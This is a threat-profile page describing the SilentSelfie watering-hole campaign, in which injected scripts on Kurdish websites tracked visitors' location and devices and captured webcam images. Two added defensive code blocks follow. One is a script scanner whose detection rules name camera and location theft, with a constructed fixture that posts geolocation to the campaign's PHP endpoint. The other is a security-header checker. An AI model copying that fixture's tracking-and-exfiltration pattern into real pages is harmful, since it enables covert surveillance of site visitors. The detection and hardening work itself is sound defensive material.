SilentSelfie (Infostealer) – Malware

March 2, 2025
in Malware, Malware Campaign

SilentSelfie

Type of Malware

Infostealer

Targeted Countries

Iran
Turkey
Syria

Date of Initial Activity

2022

Motivation

Data Theft

Type of Information Stolen

Personally Identifiable Information (PII)
Login Credentials

Attack Vectors

Web Browsing

Targeted Systems

Android

Overview

In early 2024, a sophisticated cyber espionage campaign, named SilentSelfie, was uncovered, revealing a widespread watering hole attack against Kurdish websites. This campaign, which had been running undetected for over a year, involved the compromise of 25 Kurdish websites with the aim of harvesting sensitive data from unsuspecting users. The attackers used a series of malicious scripts embedded within these websites to carry out reconnaissance and surveillance activities, targeting users with specific characteristics. The scripts ranged from simple geolocation tracking to more advanced techniques, such as activating users’ webcams and redirecting them to malicious APK downloads. Despite the lack of high-level exploits like zero-day vulnerabilities, the scale and persistence of the attack make it a notable example of how cyber attackers can leverage common web technologies for long-term surveillance.

What makes SilentSelfie particularly alarming is the scale of the operation and the subtlety of its tactics. The first signs of the attack date back to the end of 2022, yet it remained largely unnoticed until early 2024. The attackers took advantage of trusted websites within the Kurdish community to quietly deploy their malicious scripts, which were designed to run automatically when users visited compromised pages. Over time, these scripts became increasingly sophisticated, moving from simple location-tracking mechanisms to more complex forms of surveillance, such as webcam image capture and device profiling. The attack was well-orchestrated, with different variants of the malicious code being deployed across multiple websites, making detection and mitigation efforts more difficult.

Targets

Individuals’ Information

How they operate

The campaign began with a relatively simple form of data collection, involving the location-tracking of website visitors. The initial variant, identified on seventeen different websites, used a minimalistic JavaScript script to collect a user’s geographical location upon page load. When a user accessed a compromised website, the script called the gL() (getLocation) function, which prompted the browser to retrieve and share the user’s location. The obtained data was then sent to a PHP script hosted on the compromised website’s server. This form of data collection was passive, relying on users’ willingness to grant location permissions, and was designed to blend into the normal browsing experience.

As the campaign evolved, the attackers deployed more complex versions of the script. One of the key upgrades involved adding a tracking mechanism that stored a unique cookie on the victim’s device. This cookie, named sessionIdVal, allowed the attackers to track the same user across different visits to compromised websites for an extended period. The cookie was associated with a PHP script hosted on a third-party domain, ronahi[.]video, which enabled the attackers to gather users’ IP addresses and link them to specific locations. By tracking visitors over multiple browsing sessions, the attackers were able to create detailed profiles of their targets, which could be used for further surveillance or intelligence gathering.

The most sophisticated variant, which appeared later in the campaign, introduced browser configuration checks and webcam access. This version of the script was capable of detecting whether a user was visiting the site via a mobile device such as an iPhone, iPad, or Android phone. Once the user was identified as a target, the script retrieved not only the user’s geolocation but also other device information, including local IP address, battery status, screen resolution, and the device’s network connection.
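Every capability this campaign used (the geolocation prompt, the sessionIdVal tracking cookie, posting to a PHP endpoint, and the camera and WebRTC access of the later variant) shows up as plain API names in the injected script, which makes injected code on a compromised page easy to triage. The following Node.js scanner is an added example written for this page, not code from the article or from the campaign; its regex rules, the Obfuscator.io identifier heuristic and the two sample script fragments are constructed, and the only page-specific values are the cookie name sessionIdVal and the defanged domain ronahi[.]video.

```javascript
// Added example for this page (not code from the article or the campaign):
// a static scanner that reports which sensitive browser APIs and campaign
// markers appear in a JavaScript source. Rules and sample inputs are
// constructed; the cookie name and domain come from the write-up.

// Indicators taken from the write-up, stored defanged and refanged only here.
const KNOWN_BAD_HOSTS = ['ronahi[.]video'].map((h) => h.replace('[.]', '.'));
const TRACKING_COOKIE = 'sessionIdVal';

// Capability rules: each regex names a browser feature the campaign abused.
// The hex-identifier rule is a heuristic for Obfuscator.io style output.
const CAPABILITY_RULES = [
  { name: 'geolocation', re: /navigator\.geolocation\.(getCurrentPosition|watchPosition)/, note: 'reads visitor location' },
  { name: 'camera-capture', re: /navigator\.mediaDevices\.getUserMedia\s*\(/, note: 'requests camera/microphone stream' },
  { name: 'webrtc', re: /new\s+RTCPeerConnection\s*\(/, note: 'WebRTC can reveal local IP candidates' },
  { name: 'battery-status', re: /navigator\.getBattery\s*\(/, note: 'device profiling via Battery API' },
  { name: 'frame-encoding', re: /\.toDataURL\s*\(/, note: 'canvas to Base64, typical before image upload' },
  { name: 'tracking-cookie', re: new RegExp(TRACKING_COOKIE), note: 'cookie name reported for the campaign' },
  { name: 'mobile-ua-check', re: /\b(iPhone|iPad|Android)\b/, note: 'user-agent based target selection' },
  { name: 'hex-identifiers', re: /_0x[0-9a-f]{4,}/i, note: 'identifier style common in Obfuscator.io output (heuristic)' },
];

// Network sink: any request URL ending in .php, as the write-up describes.
const PHP_ENDPOINT_RE = /https?:\/\/([a-z0-9.-]+)\/[^\s'"`]*\.php/gi;

function scanScript(source) {
  const findings = [];
  for (const rule of CAPABILITY_RULES) {
    if (rule.re.test(source)) findings.push({ name: rule.name, note: rule.note });
  }
  for (const m of source.matchAll(PHP_ENDPOINT_RE)) {
    const host = m[1].toLowerCase();
    findings.push({
      name: KNOWN_BAD_HOSTS.includes(host) ? 'known-bad-endpoint' : 'php-endpoint',
      note: `sends data to ${host}`,
    });
  }
  return findings;
}

// Triage: sensor access combined with a network sink is the profile the
// article describes; a known campaign host is high on its own.
function classify(findings) {
  const names = new Set(findings.map((f) => f.name));
  if (names.has('known-bad-endpoint')) return 'high';
  const sensor = ['geolocation', 'camera-capture', 'webrtc'].some((n) => names.has(n));
  const sink = names.has('php-endpoint');
  if (sensor && sink) return 'high';
  if (sensor || names.has('tracking-cookie')) return 'medium';
  return 'low';
}

// Constructed fixtures (not recovered campaign code). The first mirrors the
// location-plus-cookie pattern described above; the second is benign.
const SAMPLE_TRACKER = `
  function gL() { navigator.geolocation.getCurrentPosition(function (p) {
    document.cookie = "${TRACKING_COOKIE}=" + _0x4a1f2();
    fetch("https://${KNOWN_BAD_HOSTS[0]}/loc.php", { method: "POST", body: JSON.stringify(p.coords) });
  }); }
`;
const SAMPLE_BENIGN = `
  window.addEventListener("load", function () { console.log("ready", navigator.language); });
`;

for (const [label, src] of Object.entries({ SAMPLE_TRACKER, SAMPLE_BENIGN })) {
  const findings = scanScript(src);
  console.log(label, classify(findings), findings.map((f) => f.name).join(', '));
}
```

Run it over every inline `<script>` block and same-origin script file served by a site you administer; the rules are intentionally coarse (a legitimate store locator will trip `geolocation`), so the value is in the `high` bucket, where sensor access and a collection endpoint occur together, and in the `known-bad-endpoint` hit, which should be extended with whatever indicators your own incident produces.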
A significant escalation came when the script used the navigator.mediaDevices.getUserMedia() API to access the user’s selfie camera. This allowed the attackers to capture images from the user’s webcam without explicit consent, a violation of basic privacy standards. These images were encoded in Base64 and transmitted to the attacker’s server, further building the target’s profile. In addition to this, the script used the WebRTC protocol to retrieve the user’s local IP address and the navigator API to gather data on the device’s battery status and other system details. After collecting this information, it would send everything—including the webcam images—back to the PHP script for storage and further analysis.

For the most advanced attack stages, the attackers also redirected selected users to download a malicious APK file. This Android application posed a threat by potentially compromising the victim’s device, enabling further exploitation.

Despite the absence of zero-day vulnerabilities, the SilentSelfie campaign exhibited a high degree of technical sophistication, with attackers utilizing a blend of browser features and social engineering tactics. They avoided detection by using obfuscation tools like Obfuscator.io to hide the script’s true nature and to make it harder for security systems to analyze the malicious code. The attackers also demonstrated persistence by repeatedly updating the malicious scripts and keeping them active across multiple Kurdish websites. This multi-stage, low-profile attack strategy allowed the campaign to collect intelligence over an extended period, likely for geopolitical or intelligence-gathering purposes.

In conclusion, the SilentSelfie campaign provides a troubling example of how cyber attackers can utilize basic web technologies to conduct highly targeted surveillance on specific user groups. The attackers relied on a series of increasingly complex malicious scripts to gather geolocation data, track user activity across different websites, and even capture webcam images from unsuspecting victims. The operation’s success highlights the need for increased awareness and vigilance regarding web-based threats, particularly those targeting minority communities and vulnerable populations. As web technologies evolve, so too will the tactics used by cyber attackers, making it imperative for both users and website owners to adopt stronger security practices to defend against such sophisticated espionage campaigns.
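One concrete "stronger security practice" for website owners follows directly from how the scripts worked: the camera and geolocation features they abused are ones a site can switch off for its own pages, and posting collected data to a third-party host is something a Content Security Policy can forbid. The Node.js snippet below is an added example written for this page, not configuration from the article or from any affected site; it shows a hardened header set and a checker that audits a response's headers against it. The response fixtures are constructed.

```javascript
// Added example for this page (not configuration from the article or from
// any affected site): response headers that deny a page's own scripts the
// camera and geolocation features the campaign abused, plus a checker that
// audits a response's headers against that baseline. Fixtures are constructed.

const HARDENED_HEADERS = {
  // An empty allowlist disables the feature for the document and all frames,
  // which includes scripts injected into the site's own pages.
  'Permissions-Policy': 'camera=(), microphone=(), geolocation=()',
  // connect-src 'self' blocks fetch/XHR/beacon to third-party hosts;
  // script-src 'self' without 'unsafe-inline' stops injected inline scripts.
  'Content-Security-Policy':
    "default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self' data:; object-src 'none'; base-uri 'self'",
};

// Parse "feature=(allowlist), ..." into { feature: "allowlist" }.
function parsePermissionsPolicy(value) {
  const policy = {};
  for (const part of value.split(',')) {
    const m = part.trim().match(/^([a-z-]+)=\((.*)\)$/);
    if (m) policy[m[1]] = m[2].trim();
  }
  return policy;
}

// Parse "directive src src; ..." into { directive: [src, ...] }.
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0]] = tokens.slice(1);
  }
  return directives;
}

// Returns a list of problems; an empty list means the response meets the baseline.
function checkHeaders(headers) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const problems = [];

  const pp = h['permissions-policy'] ? parsePermissionsPolicy(h['permissions-policy']) : {};
  for (const feature of ['camera', 'geolocation']) {
    if (pp[feature] !== '') problems.push(`Permissions-Policy does not disable ${feature}`);
  }

  const csp = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : {};
  const connect = csp['connect-src'] || csp['default-src'];
  if (!connect) problems.push('CSP sets no connect-src or default-src; requests to any host are allowed');
  else if (connect.some((src) => src !== "'self'")) problems.push(`CSP connect-src permits non-self sources: ${connect.join(' ')}`);
  const script = csp['script-src'] || csp['default-src'] || [];
  if (script.includes("'unsafe-inline'")) problems.push("CSP script-src allows 'unsafe-inline'; injected inline scripts would run");
  return problems;
}

// Constructed fixture: a typical permissive response from a CMS-hosted site.
const WEAK_RESPONSE = {
  'Content-Type': 'text/html; charset=utf-8',
  'Content-Security-Policy': "default-src * 'unsafe-inline'",
};

console.log('weak:', checkHeaders(WEAK_RESPONSE));
console.log('hardened:', checkHeaders(HARDENED_HEADERS));
```

Two caveats matter for this campaign in particular. The first variant posted to a PHP script on the compromised site itself, so `connect-src 'self'` does not stop that path and `script-src 'self'` does not stop a same-origin script file the attacker dropped; the Permissions-Policy line is the control that denies camera and location access regardless of where the script came from. Second, an attacker with write access to the site's PHP can also remove headers the application emits, so enforce them at a layer that attacker does not control (a CDN, reverse proxy or WAF) and alert when a scheduled check like `checkHeaders` starts reporting problems. Sites that legitimately call their own API host will need to add it to `connect-src`; the check above is deliberately strict so that any such addition is a reviewed decision.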
References:
  • SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites
Tags: Android, Data Collection, Infostealers, Iran, Kurdish websites, Malware, SilentSelfie, Syria, Turkey, Watering Hole Attack